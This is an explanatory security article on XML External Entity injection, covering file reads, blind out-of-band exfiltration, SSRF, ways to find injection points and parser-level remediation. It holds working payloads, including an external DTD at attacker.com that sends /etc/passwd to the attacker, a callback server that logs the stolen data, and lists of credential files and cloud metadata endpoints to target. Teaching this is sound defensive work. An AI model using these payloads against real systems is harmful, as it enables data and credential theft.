vulnerability · CWE-611 · OWASP A05:2021 · Typical severity: High

XXE: XML External Entity Injection Explained

9 min read

XML External Entity injection is a vulnerability class where the danger comes not from attacker-controlled code reaching a dangerous function, but from a feature working exactly as the specification intended. External entities are a legitimate part of the XML standard. The vulnerability is that applications allow untrusted input to control which external resources the parser retrieves.

Understanding XXE requires understanding what XML entities are and why external resolution exists in the first place.

How XML Entities Work

An XML entity is a named shorthand that expands to its declared value when referenced in the document. Internal entities are entirely self-contained:

xml
<?xml version="1.0"?>
<!DOCTYPE config [
  <!ENTITY appname "MyApplication">
]>
<config>
  <title>&appname; Configuration</title>
</config>

When parsed, &appname; expands to "MyApplication". This is a straightforward text substitution mechanism.
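
The substitution can be observed with Python's standard-library ElementTree, which expands internal entities declared in the DOCTYPE. This is a minimal sketch for illustration only; the variable names are arbitrary.

```python
import xml.etree.ElementTree as ET

# The same document as above, held in a string
DOCUMENT = """<?xml version="1.0"?>
<!DOCTYPE config [
  <!ENTITY appname "MyApplication">
]>
<config>
  <title>&appname; Configuration</title>
</config>"""

root = ET.fromstring(DOCUMENT)
# By the time application code sees the text, the reference is already replaced
title = root.find("title").text
print(title)
```

The application never sees the literal &appname; reference, because the parser resolves it before handing over the element text.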

External entities extend this by pointing the entity declaration at a resource outside the document:

xml
<?xml version="1.0"?>
<!DOCTYPE config [
  <!ENTITY disclaimer SYSTEM "file:///legal/disclaimer.txt">
]>
<config>
  <footer>&disclaimer;</footer>
</config>

Here, the parser retrieves the contents of /legal/disclaimer.txt and substitutes them wherever &disclaimer; appears. The SYSTEM keyword indicates an external resource, and the URI scheme determines what kind of resource is fetched: file:// for local files, http:// for remote URLs, and, in PHP installations with the expect extension loaded, expect:// for command output.

When an application accepts XML from untrusted sources and processes it with a parser that resolves external entities, the attacker controls what the parser retrieves.

Classic XXE: Reading Local Files

The most direct form of XXE exploits the file:// URI scheme to read files from the server's filesystem.

A vulnerable application might accept XML for data import, configuration uploads, document processing, or SOAP API calls. The attacker submits:

xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

If the parser resolves external entities and the application returns any parsed value from the <data> element in its response, the contents of /etc/passwd appear in the HTTP response body.
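
The effect of the parser setting can be reproduced safely on a local machine. The sketch below uses Python's standard-library xml.sax parser and a harmless temporary canary file in place of /etc/passwd. The helper names (TextCollector, parse_with) and the canary value are illustrative assumptions. Since Python 3.7.1 the feature_external_ges feature is off by default, so the vulnerable case has to be switched on explicitly.

```python
import io
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Accumulates all character data the parser reports."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_with(resolve_external: bool, document: bytes) -> str:
    parser = xml.sax.make_parser()
    # The setting under test: may the parser fetch external general entities?
    parser.setFeature(feature_external_ges, resolve_external)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(document))
    return "".join(collector.chunks)


# A harmless canary file stands in for a sensitive file.
with tempfile.TemporaryDirectory() as tmp:
    canary = pathlib.Path(tmp) / "canary.txt"
    canary.write_text("CANARY-1234")
    payload = (
        '<?xml version="1.0"?>'
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{canary.as_uri()}">]>'
        "<root><data>&xxe;</data></root>"
    ).encode()

    leaked = parse_with(True, payload)    # entity resolution enabled
    blocked = parse_with(False, payload)  # entity resolution disabled
```

With resolution enabled, the canary text arrives in the character data exactly as element content would. With it disabled, the reference is skipped and nothing from the file is reported.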

This technique works against files the process has read access to. Common targets:

  • /etc/passwd — system user list, confirms the vulnerability and reveals usernames
  • /etc/hosts — internal network hostnames and IP addresses
  • ~/.ssh/id_rsa — SSH private keys for the user running the application
  • Application configuration files at known paths — database credentials, API keys, connection strings
  • /proc/self/environ — environment variables including secrets passed at process start
  • Cloud instance metadata at http://169.254.169.254/ — identity credentials, IAM roles

The constraint is that file contents must be syntactically valid when substituted into the XML document. A file containing XML-special characters (<, >, &) will break the document structure and may cause a parse error before the contents can be read. This is addressed using CDATA sections or by reading the file indirectly through a crafted DTD.

Blind XXE: Out-of-Band Exfiltration

Many applications process XML without reflecting the parsed content in any response. They return a status code, a generic confirmation, or an entirely separate data structure. The parser resolves entities but the entity values never appear in the output the attacker can observe.

This is blind XXE. The application is vulnerable, but direct reading is not possible. Instead, the attacker redirects the retrieved content to an external destination they control.

Parameter Entities and Out-of-Band DTDs

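General entities are expanded only in document content and attribute values, so the contents of one cannot be spliced into the URI of another entity declaration. This prevents building a file-exfiltration payload from general entities alone. Parameter entities, declared with % and usable only inside the DTD, are expanded within the DTD itself. The XML specification forbids parameter entity references inside markup declarations in the internal subset, however, which is why the entity chain is placed in an external DTD.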

An attacker hosts an external DTD file on their own server:

xml
<!-- attacker.com/evil.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % exfil "<!ENTITY &#37; send SYSTEM 'http://attacker.com/?data=%file;'>">
%exfil;
%send;

The attack payload instructs the vulnerable parser to load this external DTD:

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
  %remote;
]>
<foo>trigger</foo>

When the parser processes this document, it fetches the external DTD, which defines a chain of parameter entities. The chain reads the target file and constructs an HTTP request to the attacker's server with the file contents encoded in the URL. The attacker's server receives the DNS lookup and HTTP request, logging the exfiltrated data even though the vulnerable application's HTTP response reveals nothing.
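
During an authorized test, the receiving side of this exchange can be as small as a handler that records the data query parameter. The following is a sketch under stated assumptions: the parameter name data matches the DTD above, while the function names, the port, and the captured list are hypothetical choices, not part of any particular tool.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

captured = []  # values received in the "data" query parameter


def extract_exfil(request_path: str) -> str:
    """Return the decoded value of the `data` parameter, or '' if absent."""
    query = parse_qs(urlparse(request_path).query)
    return query.get("data", [""])[0]


class CallbackHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        captured.append(extract_exfil(self.path))
        self.send_response(204)  # nothing needs to be returned to the parser
        self.end_headers()


def serve(port: int = 8000) -> None:
    """Blocks and records callbacks; run only on a host you control."""
    HTTPServer(("0.0.0.0", port), CallbackHandler).serve_forever()
```

For example, extract_exfil("/?data=root%3Ax%3A0%3A0") returns the decoded string root:x:0:0. A request without the parameter, such as the initial fetch of /evil.dtd, yields an empty string.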

DNS-Only Blind XXE

When outbound HTTP connections from the server are blocked but DNS is permitted, even a single DNS lookup confirms exploitability. Pointing an external entity at http://uniqueid.attacker.com/ causes the vulnerable parser to perform a DNS resolution for that subdomain. Observing the DNS lookup on the attacker's nameserver confirms that external entity resolution is occurring.
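
When several endpoints are probed in one engagement, a unique label per probe makes it possible to tell which endpoint caused a given lookup. The sketch below assumes the tester can read the query log of the authoritative nameserver; CALLBACK_DOMAIN reuses the placeholder domain from the text, and the helper names are hypothetical.

```python
import secrets

CALLBACK_DOMAIN = "attacker.com"  # placeholder from the text; use a domain you control


def new_probe(endpoint: str, registry: dict) -> str:
    """Create a unique hostname for one tested endpoint and remember the mapping."""
    token = secrets.token_hex(8)
    registry[token] = endpoint
    return f"{token}.{CALLBACK_DOMAIN}"


def match_lookup(queried_name: str, registry: dict):
    """Map a hostname seen in the nameserver log back to the endpoint, if any."""
    name = queried_name.rstrip(".").lower()
    suffix = "." + CALLBACK_DOMAIN
    if not name.endswith(suffix):
        return None
    # The probe token is the label immediately left of the callback domain
    token = name[: -len(suffix)].split(".")[-1]
    return registry.get(token)
```

The hostname returned by new_probe goes into the SYSTEM identifier of the test payload, and match_lookup is applied to each name that appears in the DNS log.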

XXE for Server-Side Request Forgery

External entity URIs are not limited to file://. The http:// scheme causes the parser to make an HTTP request to the specified URL. When that URL points to internal network addresses rather than external domains, this becomes server-side request forgery originating from the server's internal network position.

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY ssrf SYSTEM "http://192.168.1.1/admin">
]>
<root>&ssrf;</root>

The parser makes an HTTP request to 192.168.1.1/admin from the server's perspective. The response content may appear in the application's output or trigger different application behavior depending on the response received.

This provides access to:

  • Internal administrative interfaces not exposed to the internet
  • Cloud provider metadata services (169.254.169.254)
  • Services bound to localhost that trust internal traffic
  • Other microservices on the same network segment that do not authenticate requests from internal addresses

XXE-based SSRF is particularly effective in cloud environments where the instance metadata service at http://169.254.169.254/latest/meta-data/iam/security-credentials/ returns temporary IAM credentials that grant cloud API access.
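
When reviewing captured payloads or request logs, it can help to sort SYSTEM identifiers by the kind of target they reach. The classifier below is a rough sketch built on the standard library; the function name and category labels are assumptions made for illustration, and hostnames are deliberately left unresolved.

```python
import ipaddress
from urllib.parse import urlparse


def classify_target(system_uri: str) -> str:
    parsed = urlparse(system_uri)
    if parsed.scheme == "file":
        return "local file read"
    if parsed.scheme not in ("http", "https"):
        return "other scheme"
    try:
        address = ipaddress.ip_address(parsed.hostname or "")
    except ValueError:
        return "named host"  # would need DNS resolution to classify further
    # Check the narrow ranges first: Python also reports them as private
    if address.is_loopback:
        return "localhost service"
    if address.is_link_local:
        return "link-local (cloud metadata range)"
    if address.is_private:
        return "private network"
    return "public address"
```

Under this scheme, http://192.168.1.1/admin falls into "private network" and the metadata address 169.254.169.254 into the link-local category.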

Finding XXE Injection Points

Any endpoint that accepts XML is a potential XXE target. The attack surface is wider than most developers expect.

Obvious XML endpoints: SOAP web services, XML-RPC, document processors (DOCX, XLSX, SVG), RSS/Atom feed parsers, and configuration upload forms. These accept XML by design and are frequently tested.

Less obvious XML endpoints: Content-type header manipulation can reveal XML parsers behind JSON-looking interfaces. Changing Content-Type: application/json to Content-Type: application/xml and submitting an XML equivalent of the original request sometimes reveals XML parsers that process both formats.
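
Producing the XML equivalent of a JSON body can be automated for testing. The sketch below uses a naive element-per-key mapping; the root element name and the item tag for list entries are guesses, since the structure a given server expects (if it accepts XML at all) has to be discovered by experiment.

```python
import json
import xml.etree.ElementTree as ET


def json_to_xml(body: str, root_tag: str = "root") -> str:
    """Convert a JSON object into a naive element-per-key XML document."""

    def build(parent, value):
        if isinstance(value, dict):
            for key, item in value.items():
                build(ET.SubElement(parent, key), item)
        elif isinstance(value, list):
            for item in value:
                build(ET.SubElement(parent, "item"), item)
        else:
            parent.text = "" if value is None else str(value)

    root = ET.Element(root_tag)
    build(root, json.loads(body))
    return ET.tostring(root, encoding="unicode")
```

For the body {"user": "alice", "id": 7} this yields <root><user>alice</user><id>7</id></root>, which is then sent with Content-Type: application/xml. Keys that are not valid XML names would need separate handling.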

File upload endpoints: DOCX, XLSX, and PPTX files are ZIP archives containing XML, and an SVG file is itself an XML document. Uploading a crafted SVG or Office document with external entity declarations to endpoints that process these formats may trigger XXE in the document processing library. This is a common finding in applications that accept user-uploaded documents and render or summarize them server-side.
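
To see how much XML an Office upload actually carries, the archive members can be listed with the standard zipfile module. This sketch builds a tiny stand-in archive rather than a real DOCX; the function name and the choice of .xml and .rels suffixes are assumptions for illustration.

```python
import io
import zipfile


def xml_parts(archive_bytes: bytes) -> list:
    """List the members of an Office-style ZIP archive that hold XML."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        return sorted(
            name for name in archive.namelist()
            if name.endswith((".xml", ".rels"))
        )


# Build a tiny stand-in archive; a real DOCX has many more parts.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("[Content_Types].xml", "<Types/>")
    archive.writestr("word/document.xml", "<document/>")
    archive.writestr("word/media/image1.png", b"\x89PNG")

parts = xml_parts(buffer.getvalue())
```

Every part returned is a separate document that the server-side library may hand to an XML parser.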

Indirect XML consumers: Libraries used for serialization, configuration loading, and template processing sometimes consume XML internally. A library deserializing an object from XML using an attacker-influenced input path can be vulnerable without the developer being aware that XML is processed.

When testing a suspected endpoint:

  1. Submit a basic XXE payload and observe whether the response changes in timing, content, or error messaging
  2. Point the external entity at a URL you control and watch for DNS or HTTP callbacks
  3. If callbacks arrive, proceed with file read or SSRF payloads
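  4. If no callbacks arrive, either the parser has external entity resolution disabled or outbound traffic from the server is filtered; differences in error messages or timing from step 1 can help tell the two apart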

The Impact of Poorly Configured Parsers

The severity of XXE depends on what the vulnerable application can access and what it returns.

A public-facing application running with limited filesystem permissions that reflects entity values in error messages can read application configuration files containing database credentials, which is a direct path from low-severity file disclosure to full database access.

An internal tool running with elevated permissions on a network with access to cloud metadata services turns an XXE vulnerability into AWS, GCP, or Azure credential theft, granting cloud API access that may far exceed what the application itself was intended to provide.

The vulnerability is the external entity resolution. The impact is a function of the environment.

Remediation

Disable External Entity Processing

The correct fix is to configure the XML parser to refuse to process external entities and external DTDs before any input reaches it. This is a parser configuration change, not an input validation rule.

Java (DocumentBuilderFactory):

java
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);

Java (XMLInputFactory for StAX parsers):

java
XMLInputFactory factory = XMLInputFactory.newInstance();
factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);

Python:

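Use the defusedxml library in place of the standard library's XML modules such as xml.etree.ElementTree. It rejects entity declarations and external references by default. If lxml is used directly, construct its XMLParser with resolve_entities=False and no_network=True.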

python
import defusedxml.ElementTree as ET

# Entity declarations and external references raise an exception by default;
# pass forbid_dtd=True to reject any DOCTYPE declaration as well
tree = ET.parse(xml_file)
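
Where defusedxml cannot be installed, an effect similar to its forbid_dtd option can be approximated with the standard library's expat bindings. This is a sketch, not a drop-in replacement: DoctypeForbidden and parse_untrusted are hypothetical names, and the document is parsed twice, which trades some performance for simplicity.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    raise DoctypeForbidden(f"DOCTYPE '{name}' is not allowed")


def parse_untrusted(data: bytes) -> ET.Element:
    # First pass: let expat itself report any DOCTYPE, so encoding tricks
    # that fool string matching do not apply.
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(data, True)
    # Second pass: build the tree only for documents that passed the check.
    return ET.fromstring(data)
```

A document without a DOCTYPE parses normally, while any document that declares one raises DoctypeForbidden before a tree is built. This mirrors the intent of the disallow-doctype-decl feature in the Java example.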

PHP:

php
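// PHP < 8.0 only: the function is deprecated as of PHP 8.0,
// which disables external entity loading by default
if (PHP_VERSION_ID < 80000) {
    libxml_disable_entity_loader(true);
}
$doc = new DOMDocument();
// Pass no LIBXML_NOENT or LIBXML_DTDLOAD flags: they turn entity substitution and DTD loading back on
$doc->loadXML($xml);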

In PHP 8.0 and later, external entity loading is disabled by default, but explicitly passing LIBXML_NOENT to loadXML() re-enables it — a common accidental reintroduction.

Use Safer Data Formats

If the endpoint does not specifically require XML, replace it with JSON. JSON parsers do not have a concept of external references. There are no entity declarations, no DTDs, no external resource resolution. The entire vulnerability class is eliminated.

For internal services where format choice is flexible, this is the preferred approach.

Validate XML Schema Without Entity Resolution

If XML is required, validate documents against a strict schema after disabling external entity processing. Schema validation cannot substitute for disabling external entities — validation occurs after parsing, and parsing with external entities enabled is when the damage occurs. The order matters: disable external entity resolution first, then validate structure.

Why Filtering Does Not Work

A common remediation attempt is to filter the input for DOCTYPE declarations or the SYSTEM keyword. This is insufficient. DOCTYPE can be encoded using alternative character representations. SYSTEM can appear in unusual contexts. Character encoding variations in the XML declaration can cause character-by-character filtering to miss the pattern.

The vulnerability is not in the document's content reaching application code. It is in the parser executing the XML specification's external entity feature. Only disabling that feature in the parser prevents the vulnerability. Filtering what reaches the parser is an arms race that defenders reliably lose against a sufficiently motivated attacker.
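
The encoding problem is easy to reproduce. In the sketch below, a typical byte-level blocklist (a hypothetical naive_filter_allows function) inspects a UTF-16 document that uses only a harmless internal entity. The filter finds nothing to reject, yet the parser still reads the DOCTYPE and expands the entity.

```python
import xml.etree.ElementTree as ET


def naive_filter_allows(body: bytes) -> bool:
    """A typical blocklist: reject bodies containing DOCTYPE or SYSTEM."""
    upper = body.upper()
    return b"<!DOCTYPE" not in upper and b"SYSTEM" not in upper


document = (
    '<?xml version="1.0" encoding="UTF-16"?>'
    '<!DOCTYPE foo [<!ENTITY e "expanded">]>'
    "<foo>&e;</foo>"
).encode("utf-16")  # every character becomes two bytes, preceded by a BOM

passed_filter = naive_filter_allows(document)   # the filter sees no match
parsed_text = ET.fromstring(document).text      # the parser decodes UTF-16 itself
```

The filter compares ASCII byte sequences, while the parser decodes the document according to its declared encoding, so the two disagree about what the input contains.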

Summary

XML External Entity (XXE) injection exploits the way XML parsers resolve external references embedded in document markup. An attacker who can supply XML to a vulnerable endpoint can read arbitrary files from the server, perform server-side request forgery, and in specific configurations achieve remote code execution — all through a feature that exists in the XML specification itself.

Key Takeaways

  1. XXE injection exploits the XML specification's external entity feature, which allows XML documents to reference and include content from external sources such as local files or URLs
  2. Classic XXE allows attackers to read arbitrary files from the server filesystem by declaring an entity that references a file path and printing the entity value in the XML response
  3. Blind XXE sends retrieved data to an attacker-controlled server using out-of-band techniques when the application does not reflect XML content in its response
  4. XXE can be used for server-side request forgery by pointing the external entity at internal network addresses, allowing attackers to probe services behind firewalls
  5. The fix is to disable external entity processing in the XML parser rather than to filter input, because the vulnerability is in the parser configuration, not the document content

Frequently Asked Questions

What is XXE injection?

XML External Entity (XXE) injection is a vulnerability in how an application processes XML input. XML allows documents to define entities: named references that expand to their declared value when the document is parsed. External entities reference content from outside the document itself, such as a file path or a URL. When an XML parser resolves external entities from attacker-controlled input, the attacker can point those references at local files or internal network addresses, causing the parser to retrieve and potentially expose that content.

How does classic XXE read local files?

An attacker submits an XML document with a DOCTYPE declaration that defines an external entity referencing a file path, such as /etc/passwd. If the parser resolves the entity, it reads the file contents and substitutes them wherever the entity appears in the document. If the application returns any portion of the parsed XML in its response (an error message, a confirmation, or a processed value), the file contents are included. This technique requires the application to reflect XML-derived content, which makes it the simplest form of XXE.

What is blind XXE?

Blind XXE occurs when the application processes attacker-controlled XML but does not reflect the parsed content in its HTTP response. The attacker cannot directly observe whether external entities were resolved. To exfiltrate data, the attacker uses out-of-band techniques: they declare an entity that makes an HTTP request to an attacker-controlled server, embedding the target file's contents in a URL query parameter. The attacker's server receives the DNS lookup or HTTP request and logs the encoded file contents. This requires the XML parser to be able to make outbound network connections.

Can XXE lead to remote code execution?

Direct remote code execution through XXE is uncommon but possible in specific configurations. The PHP expect:// stream wrapper, if enabled, allows executing system commands through an external entity reference. Some Java XML parsers combined with specific library versions have allowed code execution through crafted entity expansion. More practically, XXE is frequently used as a stepping stone: it enables reading configuration files, application secrets, and SSH keys that can be leveraged for further access rather than executing code directly through the parser.

How do you prevent XXE?

Prevention requires disabling external entity processing and DOCTYPE declarations in the XML parser configuration before any untrusted input is parsed. The specific setting depends on the language and library: in Java, set the XMLInputFactory and DocumentBuilderFactory to disable external DTDs and entities; in PHP before 8.0, call libxml_disable_entity_loader(true) before parsing, and on any version avoid passing LIBXML_NOENT; in Python, use the defusedxml library instead of the standard ElementTree. Input validation does not prevent XXE, because the vulnerability is triggered by the parser's own feature set, not by the content of the document reaching application code.